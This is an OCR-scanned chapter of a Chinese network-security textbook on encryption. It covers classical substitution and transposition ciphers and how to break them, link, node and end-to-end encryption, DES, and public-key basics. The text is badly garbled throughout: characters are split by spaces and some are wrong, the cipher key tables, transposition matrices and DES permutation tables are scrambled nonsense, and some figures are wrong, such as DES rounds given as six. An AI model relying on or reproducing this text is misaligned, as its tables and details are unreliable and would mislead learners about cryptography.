问题 。 在 客观 上 我 们 需要 一 种 强 有 力 的 安全 措施 来 保护 机 密 数 据 不 被 窃取 和 算 改 。 解 决 这 
种 问题 的 方式 就 是 数据 加 密 。 加 密 技术 是 电子 商务 采取 的 主要 安全 保密 措施 ， 是 最 常用 的 
安全 保密 手段 ， 它 利用 密码 技术 把 重要 的 数据 变 为 乱码 (加 密 ) 传 送 ， 到 达 目 的 地 后 再 用 相 
同 或 不 同 的 手段 还 原 (解密 )。 加 密 技术 包括 两 个 元 素 : 算法 和 密 钥 。 算 法 是 加 密 和 解密 变 
换 的 规则 (数学 函数 )， 是 将 普通 的 文本 (可 以 理解 的 信息 ) 与 一 串 数字 ( 密 钥 ) 的 结合 ， 产 生 不 
可 理解 的 密 文 步 又 。 密 钥 (Key) 是 用 来 对 数据 进行 编码 和 解码 的 一 种 算法 ， 是 加 密 和 解密 时 
所 使 用 的 一 种 专门 信息 (工具 )。 

什么 是 密码 技术 呢 ? 密码 技术 是 保障 信息 安全 的 核心 技术 ， 是 保证 计算 机 网 络 安全 的 
理论 基础 。 是 结合 数学 、 计 算 机 科学 、 电 子 与 通信 等 诸多 学 科 于 一 身 的 交叉 学 科 。 它 的 主 
要 任务 是 研究 计算 机 系统 和 通信 网 络 内 信息 的 保护 方法 以 实现 系统 内 信息 的 安全 、 保 密 、 
真实 和 完整 。 所 以 ， 使 用 密码 技术 不 仅 可 以 保证 信息 的 机 密 性 ， 而 且 可 以 保证 信息 的 完整 
性 和 正确 性 ， 防 止 信息 被 算 改 、 伪 造 和 假冒 。 随 着 计算 机 网 络 不 断 渗 透 到 各 个 领域 ， 密 码 
学 的 应 用 也 随 之 扩大 。 数 字 签名 和 身份 鉴别 等 都 是 由 密码 学 派生 出 来 的 新 技术 和 应 用 。 
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如 图 6-1 所 示 说 明了 数据 加 密 的 一 般 形式 : 在 发 送 端 ， 明 文 用 加 密 算法 E 和 加 密 密 
钥 K 得 到 密 文 Y=FK(X)。 在 传送 过 程 中 可 能 出 现 密 文 截取 者 (也 可 称 为 攻击 者 或 入 侵 者 )， 
但 截取 者 没有 密 钥 就 无 法 将 其 还 原 成 明文 ， 这 样 就 保证 了 数据 的 安全 性 。 到 了 接收 端 ， 利 
用 解密 算法 D 和 解密 密 钥 KK 解 出 明文 为 DK(Y)=DK(EK(X))=X。 在 这 里 ， 我 们 假定 加 密 密 
钥 和 解密 密 钥 都 是 一 样 的 。 但 实际 上 ， 它 们 可 以 不 一 样 。 密 钥 通 常 是 由 一 个 密 钥 源 提供 。 
当 密 钥 需 要 向 远 地 传 送 时 , 一 定 要 通过 另 一 个 安全 信道 。 密码 编码 学 是 密码 体制 的 设计 学 ， 
而 密码 分 析 学 则 是 在 未 知 密 钥 的 情况 下 ， 从 密 文 推演 出 明文 或 密 钥 的 技术 。 密 码 编码 学 与 
密码 分 析 学 合 起 来 即 为 密码 学 。 
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图 6-1 一 般 的 数据 加 密 模型 


6.1.1 数据 加 密 原理 


一 般 加 密 /解密 的 函数 (算法 ) 是 公开 的 ,所 以 一 个 加 密 体系 的 强度 (被 破解 的 难度 ) 除 了 算 
法 的 强度 外 ， 还 与 密 钥 的 长 度 有 关 。 密 钥 越 长 ， 算 法 强度 越 高 ， 这 是 因为 密 钥 越 长 ， 被 猜 
出 的 可 能 性 越 低 。 因 此 ， 保 密 性 在 于 一 个 强度 高 的 算法 加 上 一 个 长 度 长 的 密 钥 。 对 不 同 的 
需要 ， 密 钥 可 以 长 度 不 同 ，64 位 的 密 钥 保护 电子 邮件 已 经 足够 ， 但 为 了 保护 一 个 一 个 商业 
秘密 ， 可 能 至 少 需要 256 位 的 密 钥 。 

作为 保障 数据 安全 的 一 种 方式 , 数据 加 密 起 源 于 公元 前 2000 年 。 埃 及 人 是 最 先 使 用 特 
别 的 象形 文字 作为 信息 编码 的 人 。 最 先 有 意识 地 使 用 一 些 技 术 方法 来 加 密 信息 的 可 能 是 公 
元 前 六 年 的 古 希腊 和 人。 他 们 使 用 的 是 一 根 叫 seytale 的 棍子 ， 送 信人 先 绕 棍 子 卷 一 张 纸 条 ， 
然后 把 要 加 密 的 信息 写 在 上 面 ， 接 着 打开 纸 送 给 收 信人 。 如 果 不 知道 棍子 的 宽度 (这 里 作为 
密 匙 ) 是 不 可 能 解密 里 面 的 内 容 的 。 后 来 ， 罗 马 的 军队 用 恺 撤 密 码 (替换 密码 ， 三 个 字母 表 
轮换 ) 进 行 通信 。 在 历次 的 战争 中 ， 都 广泛 使 用 了 密码 。 最 广为人知 的 编码 机 器 是 Greman 
Enigma 机 ， 在 第 二 次 世界 大 战 中 德国 人 利用 它 创建 了 加 密 信息 。 


6.1.2 ”加 密 技术 的 分 类 


数据 的 表现 形式 有 很 多 种 ， 文 字 是 最 常用 的 表现 形式 ， 另 外 还 有 图 形 、 声 音 、 图 像 等 
方法 ， 这 些 信 息 在 计算 机 系统 中 都 是 以 编码 的 方式 来 存储 。 传 统 加 密 方法 的 主要 应 用 对 象 
是 对 文字 信息 进行 加 密 和 解密 。 传 统 的 加 密 方法 有 蔡 换 加 密 和 变 位 加 密 。 

(1) 替换 加 密 算 法 是 比较 传统 的 加 密 算 法 ， 其 方法 是 将 明文 中 的 每 个 字母 替换 成 另 一 
个 字母 。 

例如 可 以 将 每 个 字母 的 ASCII 码 值 加 1( 加 密 密 钥 )， 这 样 A 变 成 了 B, B 变 成 了 C。 解 
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密 算法 与 加 密 算法 相反 ， 将 每 个 密 文 字母 的 ASCII 码 值 减 1( 解 密 密 钥 ) 即 可 得 出 原 明文 字 
母 。 在 蔡 换 算法 中 ASCII 码 值 的 加 值 可 以 是 任意 常数 ,甚至 可 以 进行 无 规律 的 单字 母 蔡 换 ， 
例如 可 按 下 表 来 替换 : 


区 ede Eqnrilkl nn dobry ty 
WertyurLlobpasdfqhiklis ne vb nw 


这 样 ，attack 就 被 加 密 成 gzzqea。 该 例 中 ， 上 述 对 照 表 就 是 密 钥 ， 可 看 成 密 钥 长 度 26。 
如 果 单 从 密 钥 而 言 ， 加 密 强度 是 比较 高 的 ， 因 为 密 钥 共 有 26! =4x10” 个 组 合 。 但 事实 上 
这 种 加 密 方法 很 容易 破解 (只 要 密 文 长 度 适当 )。 因 为 该 编码 方法 没有 作 任 何 处 理 以 掩盖 经 
常 使 用 的 字母 或 字母 组 合 。 破 译 方法 是 采用 自然 语言 的 统计 特征 ， 在 英语 中 ， 每 个 字母 都 
有 一 定 的 出 现 频率 ， 破 译 时 只 要 对 密 文 的 每 一 个 字母 统计 出 现 频率 ， 对 照 自然 语言 的 字母 
频率 ， 就 可 以 很 方便 地 破译 了 。 例 如 ， 在 英语 中 常 出 现 的 字母 是 E、T、A 和 N。 如 果 密 文 
中 某 个 字母 出 现 频 率 较 高 ， 那 么 它 有 可 能 是 这 几 个 字母 中 的 一 个 ， 而 不 是 Q 或 Z。 这 给 密 
码 破译 者 提供 了 可 乘 之 机 。 

第 二 次 世界 大 战 中 , 德国 人 使 用 的 Enigma 加 密 器 就 是 替换 加 密 。 德军 将 其 大 量 用 于 铁 
路 、 企 业 当中 ， 使 得 德军 保密 通信 技术 处 于 领先 地 位 。 当 时 计算 机 的 研究 就 是 为 了 破解 德 
国人 的 密码 。 由 于 图 林 等 人 的 努力 ， 终 于 破解 了 德国 人 的 密码 。 当 时 人 们 都 没有 想到 计算 
机 会 带 给 我 们 今天 的 信息 革命 。 随 着 计算 机 技术 的 发 展 ， 过 去 很 多 密码 的 破译 都 变 得 十 分 
简单 。 

(2) 变 位 (Transposition) 加 密 算法 是 另 一 种 传统 加 密 算 法 ， 在 这 种 算法 中 ， 字 母 不 是 被 
替换 成 另 一 个 字母 ， 而 是 变换 字母 出 现 的 位 置 。 

下 例 中 , 密 钥 是 megabuck， 对 pleasetransferonemilliondollarstomyswissbankaccountsixtwotwo 
进行 加 密 ， 加 密 过 程 是 (不 满 一 列 时 用 abcde 等 补 写 ): 


M e g a b u C k 
bs 4 5 1 党 8 3 6 
P 1 e a S e t I 
A n S f e r 0 n 
E m i 1 | i 0 n 
D 0 本 1 a 这 S 人 
O m y S w i S S 
B a n k a 让 c 0 
TU n 好 S i 和 t Ww 
0 w 0 a b c d 


加 密 时 按 列 书写 ， 书 写 次 序 是 按 字母 顺序 进行 ， 上 述 加 密 后 的 密 文 是 : 

afllsksoselawaiatoossctclnmomantesilyntwrnntsowdpaedobuoeriricxb 

变 位 加 密 算法 的 破译 有 几 个 步 又 。 

(1) 先 确定 加 密 方法 是 变 位 算法 。 一 般 方法 是 对 密 文 的 字母 进行 频率 统计 ， 如 果 频 率 
和 自然 语言 的 频率 符合 ， 那 么 基本 上 可 以 确定 密 文采 用 的 是 变 位 加 密 算法 。 


中 [| | 萝 6 音 加 区 基 天 与 店 帮 专 有 万 克 


(2) 确定 密 钥 长 度 。 通 常 需要 了 解密 文中 可 能 出 现 的 词汇 ， 比 如 估计 上 述 例子 中 
milliondollars 是 一 个 可 能 出 现 的 词汇 ， 对 于 长 度 不 大 的 密 铀 ， 由 于 词汇 长 度 比 密 钥 长 度 大 ， 
那么 会 产生 字母 回 绕 ， 下 面 是 一 些 可 能 密 钥 长 度 下 字母 回 绕 在 密 文中 产生 的 双 字 母 组 合 : 

3 ME I EO DOO NG Dl OAs TR LS 

ML 10 LN TD; 10 “Ob, NL Das "OR “LS 
MO, WD: Lo TLL; ‘OL NA;: DR;: ‘OS 
Lo; LI» HW ON NR: DS 

: MD, I0, IL, 1, IA, OR, NS 

: MOo, LIL, LL, LA, IR, OS 

上 述 密 钥 长 度 为 8 的 一 行 的 双 字母 组 合 都 出 现在 密 文 中 ， 可 以 基本 确定 密 钥 长 度 为 8， 
这 样 可 以 把 密 文 如 下 排列 : 
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1 2 3 4 5 6 7 8 
a % t 和 e I 区 © 
» e 0 n S 卫 A K 
1 | 0 m i n E 六 
1 a S 0 1 D 于 
S w S y S O 1 
k a 3 a n 0 B 二 
S i t n t w U 
0 a c t Ww d O b 


(3) 最 后 还 要 重新 确定 列 序 。 从 milliondollaes 可 以 知道 列 4、5、1、2、8、 
邻 的 列 ， 通 过 实验 可 以 确定 列 序 如 下 : 


(LDO 
a 
[a 
EE: 


BO 
站 入 和 浊 全 六 是 吕 条 
CC 
on "pam -on bp 
CL ne o 
和 全 
人 on" ee 


局 人 0 


从 而 可 以 确定 明文 。 
6.1.3 ”加 密 技术 的 优势 


加 密 技术 的 应 用 是 多 方面 的 ， 但 最 为 广泛 的 还 是 在 电子 商务 和 VPN( 虚 拟 专用 网 ) 上 的 
应 用 。 一 个 单位 的 文档 要 通过 保密 级 别 来 保存 管理 ， 以 限制 文档 的 流通 范围 。 个 人 也 可 以 
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根据 自己 文档 的 性 质 为 其 加 密 ， 以 保护 个 人 隐私 。 一 个 加 密 网 络 ， 不 但 可 以 防止 非 授权 用 
户 的 搭 线 窃听 和 入 网 ， 而 且 也 是 对 付 恶 意 软件 的 有 效 方法 。 一 般 的 数据 加 密 可 以 在 网 络 的 
三 个 层次 来 实现 : 链 路 加 密 、 节 点 加 密 和 端 到 端 加 密 。 

1. 链 路 加 密 


对 于 在 两 个 网 络 节点 间 的 某 一 段 通信 和 链 路 ， 链 路 加 密 能 为 网 上 传输 的 数据 提供 安全 保 
障 。 对 于 链 路 加 密 (又 称 在 线 加 密 )， 所 有 消息 在 被 传输 之 前 进行 加 密 ， 在 每 一 个 节点 对 接 
收 到 的 消息 进行 解密 ， 然 后 使 用 下 一 个 链 路 的 密 钥 对 消息 加 密 ， 再 进行 传输 。 在 到 达 目 的 
地 之 前 ， 一 条 消息 可 能 要 经 过 许多 通信 链 路 的 传输 。 

由 于 在 每 一 个 中 间 传 输 节点 消息 均 被 解密 后 重新 进行 加 密 ， 因 此 ， 包 括 路 由 信息 在 内 
的 链 路 上 的 所 有 数据 均 以 密 文 形式 出 现 。 这 样 ， 链 路 加 密 就 掩盖 了 被 传输 消息 的 源 点 与 终 
点 。 由 于 填充 技术 的 使 用 以 及 填充 字符 在 不 需要 填充 数据 的 情况 下 就 可 以 进行 加 密 ， 这 使 
得 消息 的 频率 和 长 度 特征 得 以 掩盖 ， 从 而 可 以 防止 对 通信 业务 进行 分 析 。 

尽管 链 路 加 密 在 计算 机 网 络 环境 中 使 用 得 相当 普遍 ， 但 它 并 非 没有 问题 。 链 路 加 密 通 
常用 在 点 对 点 的 同步 或 异步 线路 上 ， 它 要 求 先 对 在 链 路 两 端的 加 密 设 备 进行 同步 ， 然 后 使 
用 一 种 链 模 式 对 链 路 上 传输 的 数据 进行 加 密 。 这 就 给 网 络 的 性 能 和 可 管理 性 带 来 了 副作用 。 

一 方面 ， 在 线路 或 信号 经 常 不 通 的 海外 或 卫星 网 络 中 ， 链 路 上 的 加 密 设 备 需要 频繁 地 
进行 同步 ， 带 来 的 后 果 是 数据 丢失 或 重 传 。 另 一 方面 ， 即 使 仅 一 小 部 分 数据 需要 进行 加 密 ， 
也 会 使 得 所 有 传输 数据 被 加 密 。 

链 路 加 密 仅 在 通信 和 链 路 上 提供 安全 性 , 在 一 个 网 络 节点 中 消息 以 明文 形式 存在 ， 因 此， 
所 有 节点 在 物理 上 必须 是 安全 的 ， 否 则 就 会 泄露 明文 内 容 。 然 而 保证 每 一 个 节点 的 安全 性 
需要 较 高 的 费用 ， 为 每 一 个 节点 提供 加 密 硬件 设备 和 一 个 安全 的 物理 环境 所 需要 的 费用 由 
以 下 几 部 分 组 成 : 保证 节点 物理 安全 的 雇员 开销 ， 为 确保 安全 策略 和 程序 的 正确 执行 而 进 
行 审计 时 的 费用 ， 以 及 为 防止 安全 性 被 破坏 时 带 来 损失 而 参加 保险 的 费用 。 

在 传统 的 加 密 算法 中 ， 用 于 解密 消息 的 密 钥 与 用 于 加 密 的 密 钥 是 相同 的 ， 该 密 钥 必 须 
被 秘密 保存 ， 并 按 一 定 规则 进行 变化 。 这 样 ， 密 钥 分 配 在 链 路 加 密 系 统 中 就 形成 了 一 个 问 
题 ， 因 为 每 一 个 节点 必须 存储 与 其 相连 接 的 所 有 链 路 的 加 密 密 钥 ， 这 就 需要 对 密 钥 进行 物 
理 传 送 或 者 建立 专用 网 络 设施 。 而 网 节点 地 理 分 布 的 广阔 性 使 得 这 一 过 程 变 得 复杂 ， 同 时 
增加 了 密 钥 连续 分 配 时 的 费用 。 


2. 节点 加 密 


尽管 节点 加 密 能 给 网 络 数据 提供 较 高 的 安全 性 ， 但 它 在 操作 方式 上 与 链 路 加 密 是 类 似 
的 : 两 者 均 在 通信 链 路 上 为 传输 的 消息 提供 安全 性 ; 都 在 中 间 节 点 先 对 消息 进行 解密 ， 然 
后 进行 加 密 。 因 为 要 对 所 有 传输 的 数据 进行 加 密 ， 所 以 加 密 过 程 对 用 户 是 透明 的 。 

然而 ， 与 链 路 加 密 不 同 ， 节 点 加 密 不 允许 消息 在 网 络 节点 以 明文 形式 存在 ， 它 先 把 收 
到 的 消息 进行 解密 ， 然 后 采用 另 一 个 不 同 的 密 钥 进行 加 密 ， 这 一 过 程 是 在 节点 上 的 一 个 安 
全 模块 中 进行 的 。 

节点 加 密 要 求 报头 和 路 由 信息 以 明文 形式 传输 ， 以 便 中 间 节 点 能 得 到 如 何 处 理 消息 的 
信息 。 因 此 这 种 方法 对 于 防止 攻击 者 分 析 通 信 业 务 是 脆弱 的 。 
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3. 端 到 端 加密 

端 到 端 加 密 允 许 数据 从 源 点 到 终点 的 传输 过 程 中 始终 以 密 文 形式 存在 。 采 用 端 到 端 加 
密 ( 又 称 脱 线 加 密 或 分 组 加 密 ) 消 息 在 被 传输 到 达 终 点 之 前 不 进行 解密 ， 因 为 消息 在 整个 传 
输 过 程 中 均 受 到 保护 ， 所 以 即使 有 节点 被 损坏 也 不 会 使 消息 泄露 。 

端 到 端 加 密 系 统 的 价格 便宜 些 , 并 且 与 链 路 加 密 和 节点 加 密 相 比 更 可 靠 , 更 容易 设计 、 
实现 和 维护 。 端 到 端 加 密 还 避免 了 其 他 加 密 系统 所 固有 的 同步 问题 ， 因 为 每 个 报 文 包 均 是 
独立 被 加 密 的 ， 所 以 一 个 报 文 包 所 发 生 的 传输 错误 不 会 影响 后 续 的 报 文 包 。 此 外 ， 从 用 户 
对 安全 需求 的 直觉 上 讲 ， 端 到 端 加 密 更 自然 些 。 单 个 用 户 可 能 会 选用 这 种 加 密 方法 ， 以 便 
不 影响 网 络 上 的 其 他 用 户 ， 此 方法 只 需要 源 和 目的 节点 是 保密 的 即 可 。 

端 到 端 加 密 系 统 通常 不 允许 对 消息 的 目的 地 址 进行 加 密 ， 这 是 因为 每 一 个 消息 所 经 过 
的 结 点 都 要 用 此 地 址 来 确定 如 何 传输 消息 。 由 于 这 种 加 密 方法 不 能 掩盖 被 传输 消息 的 源 点 
与 终点 ， 因 此 它 对 于 防止 攻击 者 分 析 通 信 业 务 是 脆弱 的 。 


6.2 ”现代 加 密 算法 介绍 


数据 加 密 作 为 一 项 基本 技术 是 所 有 通信 安全 的 基石 。 数 据 加 密 过 程 是 由 形形色色 的 加 
密 算法 来 具体 实施 的 ， 它 以 很 小 的 代价 提供 很 大 的 安全 保护 。 在 多 数 情况 下 ， 数 据 加 密 是 
保证 信息 机 密 性 的 唯一 方法 。 据 不 完全 统计 ， 到 目前 为 止 ， 已 经 公开 发 表 的 各 种 加 密 算法 
多 达 上 百 种 。 如 果 按照 收发 双方 密 钥 是 否 相同 来 分 类 ， 可 以 将 这 些 加 密 算法 分 为 私密 密 钥 
算法 (对 称 密 钥 算法 ) 和 公开 密 钥 算法 (不 对 称 密 钥 算法 )。 


6.2.1 对称 加 密 技术 


对 称 加 密 算法 是 一 种 隐藏 文本 含义 的 文本 变换 机 制 ， 对 称 加 密 采用 了 对 称 密码 编码 技 
术 。 它 的 特点 是 文件 加 密 和 解密 使 用 相同 的 密 钥 ， 即 加 密 密 钥 也 可 以 用 作 解 密 密 钥 ， 这 种 
方法 在 密码 学 中 叫 作对 称 加 密 算法 ， 加 密 函 数 将 消息 和 密 钥 值 作为 输入 ， 生 成 并 输出 与 输 
入 消息 大 致 等 长 的 随机 字 节 序列 ， 解 密 函数 与 加 密 函数 同样 重要 ， 它 以 加 密 函数 输出 的 随 
机 字 节 序列 和 加 密 函数 使 用 的 密 钥 作为 输入 ， 生 成 原始 消息 。“ 对 称 ”一 词 是 指 要 成 功 地 
解密 消息 , 必须 使 用 用 于 消息 加 密 的 密 钥 值 来 解密 。 对 称 加 密 算法 则 在 保护 消息 的 机 密 性 。 


1. 对 称 密 钥 密码 算法 基本 原理 


假设 小 明和 小 红 使 用 对 称 密 钥 进 行 通信 ， 则 : 

(1) 小 明和 小 红 同 意 使 用 同一 个 密码 系统 

(2) 小 明和 小 红 同 意 使 用 同一 个 密码 ; 

G3) 小 红 把 她 的 明文 用 加 密 算法 和 加 密 密 钥 生 成 一 个 密 文 ; 

(4) 小 红 把 密 文 发 给 小 明 ; 

(5) 小 明 用 相同 的 算法 和 密 钥 解密 把 密 文 还 原 为 明文 阅读 。 

如 果 有 一 个 偷 听 者 ， 偷 到 了 密 文 ， 会 因为 他 自己 的 计算 能 力 不 能 解密 密 文 。 但 如 果 偷 
听 者 知道 小 明和 小 红 使 用 的 密码 系统 和 密码 ， 又 偷 听 到 了 密 文 ， 则 小 明和 小 红 的 通信 就 不 
安全 了 。 所 以 ， 好 的 加 密 系统 的 安全 性 寓于 密 钥 而 不 在 于 算法 。 


© 


(CG 计算 机 网 络 安全 (第 2 版 ) 


- 潼 洲 蓝 状 和 ”过 淡 开 评 上 H 册 囊 沼 卫 


除了 数据 加 密 标准 (DES), 另 一 个 对 称 密 钥 加 密 系统 是 国际 数据 加 密 算法 (IDEA), 它 比 
DES 的 加 密 性 好 , 而 且 对 计算 机 功能 要 求 也 没有 那么 高 .IDEA 加 密 标准 由 PGP(Pretty Good 
Privacy) 系 统 使 用 。 在 众多 的 私密 密 钥 算法 中 影响 最 大 的 是 DES 算法 。 


2. 数据 加 密 标准 一 一 DES 


1973 年 ， 美 国 国家 标准 局 (NBS)， 即 现在 的 美国 国家 标准 技术 研究 所 (NIST) 公 布 了 征 
求 国家 密码 标准 的 提案 ， 人 们 建议 了 许多 密码 系统 ， 经 过 对 这 些 建议 的 密码 系统 进行 评估 
之 后 ，1977 年 ， 美 国 国家 标准 局 采纳 了 IBM 在 20 世纪 60 年 代 研制 出 来 的 一 个 被 称 为 
LUCIFER 的 密码 系统 作为 数据 加 密 标准 (Data Encryption Standard，DES，DES 成 为 世界 上 
应 用 最 广泛 的 密码 系统 ， 在 DES 公布 之 前 ， 密 码 算法 的 设计 者 总 是 掩盖 算法 的 实际 细节 ， 
DES 开创 了 公布 加 密 算法 的 先例 ， 是 密码 史上 第 一 个 公开 的 加 密 算法 ， 其 设计 核心 思想 是 
让 所 有 的 秘密 富 于 密 钥 之 中 。 

DES 使 用 相同 的 算法 来 对 数据 进行 加 密 和 人 解密， 所 使 用 的 加 密 密 钥 和 解密 密 钥 是 相同 
的 ， 算 法 的 输入 有 64 位 明文 ， 使 用 56 位 的 密 钥 ( 密 钥 总 长 是 64 位 ， 其 中 8 位 用 于 奇偶 校 
检 )， 输 出 是 64 位 的 密 文 ， 它 使 用 16 轮 的 混合 操作 ， 目 标 是 彻底 打 乱 明 文 的 信息 ， 使 得 密 
文 的 每 1 位 都 依赖 于 明文 的 每 1 位 和 密 钥 的 每 1 位 。 

DES 算法 对 明文 的 处 理 经 过 了 三 个 阶段 。 

阶段 1: 64 位 的 明文 经 过 初始 置换 进行 比特 重 排 ， 这 一 过 程 不 使 用 密 钥 。 

阶段 2: 16 次 与 密 钥 相关 的 循环 加 密 运算 ， 这 一 过 程 既 包括 置换 又 包含 蔡 代 。 

阶段 3: 逆 初 始 置换 。 

(1) 初始 置换 是 简单 的 移 位 操作 ,这 一 过 程 不 使 用 密 钥 。 初始 置换 把 明文 的 64 位 中 的 
0 和 1 串 按 8x8 矩阵 排列 并 编号 ， 然 后 将 其 打 乱 重 排 。 

(2) 经 过 初始 置换 输出 的 64 位 将 经 过 16 次 与 密 钥 相关 的 循环 加 密 运 算 ， 每 次 循环 加 
密 的 详细 过 程 如 图 6-2 和 图 6-3 所 示 ， 主 要 由 以 下 步骤 组 成 。 


4 位 明文 


] 


初始 置换 P 
56 位 密 钥 J 


第 一 轮 加 密 


第 二 轮 加 密 循 


yy yy 


16 轮 加 密 


! 


逆 初 始 置换 


和 相 曙 小 他 茎 放飞 


三 位 密 文 


6-2 ”DES 算法 的 主要 步骤 


中 | 由 | | 萝 6 音 加 柳 花 天 与 店 故 专 有 万 克 


| et | 58 50 42 34 26 18 10 


过 

9 8 3 60 52 4 36 28 20 12 4 
17 18 19 20 21 22 23 24 62 54 46 38 30 22 14 6 
EP 64 56 48 40 32 24 16 8 
对 3 对 53 耻 和 38 39 40 J 
41 42 43 44 45 46 47 48 元 7 2 | 
办 四 入 和 入 入 入 声 2 7 
57 58 59 60 61 62 63 64 603.385. "47 3 23 


6-3 ”明文 的 64 位 输入 顺序 
”把 每 次 循环 前 的 64 位 分 成 两 个 32 位 的 码 组 ， 分 别 用 L ,和 R; ,表示 左 32 位 和 右 


@@ ”把 输入 码 组 的 右边 32 位 变 成 输出 码 组 的 左边 32 位 。 用 表示 。 

@ 输入 码 组 的 右边 32 位 R,, 经 过 扩展 置换 下 被 扩展 成 48 位 。 

@ 用 64 位 的 密 钥 ( 去 掉 8 位 奇偶 校 检 位 ， 实 际 为 56 位 密 钥 ) 产 生 16 次 循环 所 需要 的 
16 丫 子 密 铜 E> ky es- 

@ 把 48 位 的 子 密 钥 与 第 三 步 变 换 得 到 的 结果 进行 异 或 运算 ， 得 到 48 位 结果 。 

@ 经 过 S 替代 形成 32 位 的 输出 结果 。 

”经 过 置换 P， 产 生 32 位 码 组 。 

@ ”把 第 7 步 的 32 位 的 输出 与 输入 码 组 的 左边 32 位 L, ,进行 异 或 运算 ， 产 生 R,， 它 
是 64 位 输出 码 组 的 右边 32 位 。 从 第 1 步 到 第 8 步 的 运算 一 共 循环 6 次 。 

@ 最 后 一 次 循环 生成 的 64 位 再 经 过 逆 初 始 置换 ， 这 一 变换 过 程 是 初始 置换 的 逆 过 
程 ， 也 不 使 用 密 钥 ， 如 图 6-4 所 示 。 

输入 的 64 位 明文 到 这 里 就 生成 了 对 应 的 64 位 密 文 输出 。 

DES 的 解密 过 程 和 加 密 过 程 相 似 ， 是 16 个 子 密 钥 的 使 用 次 序 反 过 来 。 


40 8 48 16 56 24 64 32 
39 A 47 15 55 23 63 31 
38 6 46 14 54 22 62 30 
37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 
35 和 43 11 51 19 59 27 
34 2 42 10 50 18 58 
33 41 Eg 49 17 57 
6-4 ” 逆 初始 置换 


6.2.2” 非 对 称 加 密 技 术 


在 对 称 密 钥 密码 算法 中 ， 加 密 和 解密 双方 使 用 的 是 相同 的 密 钥 ， 所 以 ， 在 双方 进行 保 
密 通 信之 前 必须 持 有 相同 的 密 钥 。 若 有 n 个 人 要 相互 进行 保密 通信 ， 网 络 中 就 会 有 
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nx(n 一 ])/2 个 密 钥 ， 这 为 密 钥 的 管理 和 更 新 都 带 来 了 极 大 的 不 便 ， 也 是 对 称 算法 的 一 大 
缺点 。 

非 对 称 密码 算法 解决 了 这 一 问题 。 非 对 称 密码 也 叫 公 钥 密 码 ， 和 对 称 加 密 算 法 一 样 ， 
非 对 称 加 密 算 法 也 提供 两 个 函数 : 消息 加 密 和 消息 解密 ， 但 该 算法 较 对 称 加 密 算 法 有 两 个 
重要 的 区 别 。 首 先 ， 用 于 消息 解密 的 密 钥 值 与 用 于 消息 加 密 的 密 钥 值 不 同 ， 其 次 ， 非 对 称 
加 密 算法 比 对 称 加 密 算法 慢 数 千 倍 ， 但 在 保护 通信 安全 方面 ， 非 对 称 加 密 算 法 却 具有 对 称 
密码 难以 企及 的 优势 。 

非 对 称 加 密 算法 中 的 两 个 密 钥 : 公开 密 钥 (publickey) 和 私有 密 钥 (privatekey) 是 一 对 ， 如 
果 用 公开 密 钥 对 数据 进行 加 密 ， 只 有 用 对 应 的 私有 密 钥 才能 解密 ; 如 果 用 私有 密 钥 对 数据 
进行 加 密 ， 那 么 只 有 用 对 应 的 公开 密 钥 才能 解密 。 正 是 因为 加 密 和 解密 使 用 的 是 两 个 不 同 
的 密 钥 ， 所 以 这 种 算法 叫 作 非 对 称 加 密 算 法 。 

为 说 明 非 对 称 加 密 算 法 的 优势 ， 来 回顾 一 下 前 面 使 用 对 称 加 密 算法 的 例子 : 小 红 使 用 
密 钥 K 加 密 消息 并 将 其 发 送 给 小 明 ， 小 明 收 到 加 密 的 消息 后 ,使 用 密 钥 K 对 其 解密 以 恢复 
原始 消息 。 这 里 存在 一 个 问题 , 即 小 红 如 何 将 用 于 加 密 消息 的 密 钥 值 发 送 给 小 明 ? 答案 是 : 
小 红 发 送 密 钥 值 给 小 明 时 必须 通过 独立 的 安全 通信 信道 ( 即 没 人 能 监听 到 该 信道 中 的 
通信 )。 

这 种 使 用 独立 安全 信道 来 交换 对 称 加 密 算法 密 钥 的 需求 会 带 来 更 多 问题 。 首 先 ， 如 果 
有 独立 的 安全 信道 ， 为 什么 不 直接 用 它 发 送 原始 消息 ? 答案 通常 是 安全 信道 的 带宽 有 限 ， 
如 安全 电话 线 或 可 信 的 送信 人 。 其 次 ， 小 明和 小 红 能 假定 他 们 的 密 钥 值 可 以 保持 多 久 而 不 
泄露 ( 即 不 被 其 他 人 知道 ) 以 及 他 们 应 在 何 时 交换 新 的 密 钥 值 ? 对 这 两 个 问题 的 回答 属于 密 
钥 管 理 的 范畴 。 密 钥 管 理 是 使 用 加 密 算 法 时 最 棘手 的 问题 ， 它 不 仅 涉及 如 何 将 密 钥 值 安全 
地 分 发 给 所 有 通信 方 , 还 涉及 密 钥 的 生命 周期 管理 、 密 钥 被 破解 时 应 采取 什么 措施 等 问题 。 
小 红 和 小 明 的 密 钥 管理 需求 可 能 并 不 复杂 ， 他 们 可 以 通过 电话 (如 果 确 定 没 人 监听 ) 或 通过 
挂号 信 来 交换 密码 。 但 如 果 小 红 不 仅 需要 与 小 明 安全 通信 , 还 需要 与 许多 其 他 人 安全 通信 ， 
那么 她 就 需要 与 每 个 人 交换 密 钥 (通过 可 靠 的 电话 或 挂号 信 )， 并 管理 这 一 系列 密 钥 ， 包 括 
记 住 何 时 交换 新 密 钥 、 如 何 处 理 密 钥 泄露 和 密 钥 不 匹配 (由 于 使 用 的 密 钥 不 正确 ， 接 收 方 无 
法 解密 消息 )。 

如 果 小 红 要 给 数 百 人 发 送 消息 ， 那 么 事情 将 更 麻烦 ， 她 必须 使 用 不 同 的 密 钥 值 来 加 密 
每 条 消息 。 例 如 ， 要 给 100 个 人 发 送 通知 ， 小 红 需 要 加 密 消息 100 次 ， 对 每 个 接收 方 加 密 
一 次 消息 。 显 然 ， 在 这 种 情况 下 ， 使 用 对 称 加 密 算法 来 进行 安全 通信 的 开销 相当 大 。 非 对 
称 加 密 算 法 的 主要 优势 是 使 用 两 个 而 不 是 一 个 密 钥 值 : 一 个 密 钥 值 用 来 加 密 消息 ， 另 一 个 
密 钥 值 用 来 解密 消息 。 这 两 个 密 钥 值 在 同一 个 过 程 中 生成 ， 称 为 密 钥 对 。 用 来 加 密 消息 的 
密 钥 称 为 公 钥 ， 用 来 解密 消息 的 密 钥 称 为 私 钥 。 用 公 钥 加 密 的 消息 只 能 用 与 之 对 应 的 私 钥 
来 解密 ， 私 钥 除 了 持 有 者 外 无 人 知道 ， 而 公 钥 却 可 通过 非 安全 管道 来 发 送 或 在 目录 中 发 布 。 
